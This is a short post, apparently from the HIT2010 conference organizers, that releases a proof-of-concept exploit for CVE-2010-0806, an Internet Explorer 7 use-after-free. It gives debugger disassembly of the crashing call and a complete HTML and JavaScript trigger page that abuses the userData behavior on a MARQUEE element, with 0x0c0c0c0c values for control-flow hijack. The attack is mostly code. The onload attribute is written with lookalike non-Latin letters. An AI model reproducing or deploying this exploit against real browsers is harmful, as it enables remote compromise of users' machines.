A great celebration of HIT2010
release CVE-2010-0806 Reliable poc
CFP for HIT2010 is out
WinXP & Vista IE7 reliable poc
6B6DC815 8B46 08 MOV EAX,DWORD PTR DS:[ESI+8]
6B6DC818 8B08 MOV ECX,DWORD PTR DS:[EAX]
6B6DC81A 50 PUSH EAX
6B6DC81B FF51 08 CALL DWORD PTR DS:[ECX+8]//ECX=0 ×0c0c0c0c
<code><html><head><style type="text/css">.demo {behavior: url(#default#userData);}</style></head><script>function exp() {for (i = 1; i <10; i ++ ){hit2010.setAttribute("nanika",document.location);}hit2010.setAttribute("nanika",document.getElementsByName("style"));document.location="about:/u0c0c/u0c0c/u0c0c/u0c0cblank";}</script><body οnlοad="exp();"></body><MARQUEE id="hit2010" class="demo"></MARQUEE></html></code>